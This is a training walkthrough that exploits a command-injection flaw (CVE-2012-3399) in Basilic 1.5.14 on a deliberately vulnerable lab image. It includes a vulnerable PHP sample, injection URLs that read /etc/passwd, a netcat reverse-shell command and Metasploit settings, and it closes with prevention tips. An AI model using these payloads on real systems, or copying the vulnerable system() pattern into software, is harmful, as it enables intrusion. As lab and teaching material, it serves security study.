Pentester Academy Command Injection ISO: Basilic 1.5.14 exploitation
The Pentester Academy has just recently launched a Command Injection ISO virtual image of Ubuntu. This image has 10 real-world applications which have a vulnerable application framework. Remote code execution is possible by exploiting each of the installed application. It is important to note that this application is not running entirely on port 80.
Refer to the following links for related downloads and pertinent information:
FREE role-guided training plans
https://www.vulnhub.com/entry/command-injection-iso-1,81/
http://www.pentesteracademy.com/course?id=12
What is Command Injection?
Command injection is an attack where the Cyberattacker tries to pass malicious payloads which are improperly handled by the application and then subsequently executed on the system shell. This vulnerability leads to remote code execution on the host machine where the vulnerable application resides on.
Command injection runs with the same privilege as that of the application. For example, if the vulnerable application is executed with the privilege of www-data, and if it is later exploited, then the Cyber attacker will get root privileges associated with the www-data.
The main reason for command injection vulnerability is the lack of input validation and system call or system methods that are used in the source code itself.
This is illustrated with a sample of vulnerable code for launching a command injection:
Create a file "test.txt" and write "Command injection test" in that file and save it as "read.php."
<?php
print ("Command Injection testing")
print("<p>");
$file=$_GET['fileread'];
system("cat $file");
?>
To read a file, we must send a "GET" request to the server with the parameter "fileread" in the URL as described below:
http://localhost/read.php?fileread=abc.txt
The output will be as follows:
Command Injection testing
Command injection text
To exploit the command injection vulnerability in the above code, we need to send the following request to the server:
http://localhost/read.php?fileread=abc.txt;id
The output will be:
Command Injection testing
Command injection text
Uid=33 (www-data) gid=33(www-data) groups=33(www-data)
The attacker then executes a command with the same privilege which is the same of the application which is currently running. This is how the command injection vulnerability is then executed.
There are other variants of executing "id" on the vulnerable application, and they are as follows:
http://localhost/read.php?fileread=abc.txt || id
http://localhost/read.php?fileread=abc.txt && id
If the installed application runs with root privilege, then the command injection can execute any command on the vulnerable host machine that the root user can execute.
Lab setup required for command injection pentest:
- Kali Linux (Bridged or NAT). Attacker Kali Linux IP is 192.168.1.102
- Command Injection ISO (Bridged or NAT). Target IP is 192.168.1.103
Understanding the look and feel of command injection ISO:
Command injection ISO provides us the facility to login into the OS and get a close look at the vulnerable application. To do this, log in to the command injection ISO with the username as "securitytube" and password as "123321".
Checking out for port 80 on Command Injection ISO (192.168.1.103)
As seen above there are many frameworks installed for exploitation. We will be working with Basilic 1.5.14 in this article.
What is Basilic?
Basilic is a bibliography server that is used for research labs. It helps in the automation and diffusion of the research publication on the internet. It also generates a web page from the publication database. This framework helps with indexing, searching and various other options.
Basilic requires PHP, Apache, and MySQL for the proper installation and configuration.
To download, configure and install basilic click on the below link: http://artis.imag.fr/Software/Basilic/
Now click on the basilic folder, and you will see the following screen:
Searching for an exploit on the internet we will find CVE-2012-3399 which elaborates an improper input validation by Basilic on the following URL:
http://www.securityfocus.com/bid/54234/exploit
The exploit URL provides the vulnerable URL that leads to the Remote Code Execution.
The exploit helps to determine that the "diff.php" file is vulnerable to input handling and it is present in the /basilica/Config directory:
http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2
Due to the output encoding of SecurityFocus, it seems to be obfuscated. An actual exploit can be seen at this link:
http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2
Using the exploit mentioned above for command execution., the following screen thus appears:
We can execute a system command using a file parameter to get a reverse shell which is as follows:
Start a listener on Kali
root@kali#nc -lvvp 3333
Enter the command in file parameter as "diff.php?file=|nc -v 127.0.0.1 3333 -e /bin/bash&new=1&old=2"
Got the Shell.
The vulnerability of the Metasploit and Kali can now be exploited which is as follows:
Searching for an exploit in exploit-db with searchsploit tool in Kali Ruby exploit gives the following screen:
If the language is ruby, then it will also be present in Metasploit which can be described as follows:
Searching for an exploit in the MSF framework.
root@kali# service postgresql start
root@kali# service metasploit start
root@kali# msfconsole
msf> search basilic
The above screen shows an Arbitrary Command Execution exploit for Basilic.
Now, configure and run Metasploit as shown below:
Module options
RHOST 192.168.1.103
RPORT 80
TARGETURL /basilic-1.5.14/
Payload options
LHOST 192.168.1.102
LPORT 4444
Finally, Exploit.
We have thus successfully exploited a command injection vulnerability in basilic and got the www-data privilege on the target.
How to prevent command injection:
- The developer should implement proper input validation; special characters should not be used throughout the entire application.
- The system call function should not be used anywhere in the backend programming.
- The software application should run with least privilege.
References:
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=26238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3399
http://www.securityfocus.com/bid/54234
https://www.owasp.org/index.php/Command_Injection
What should you learn next?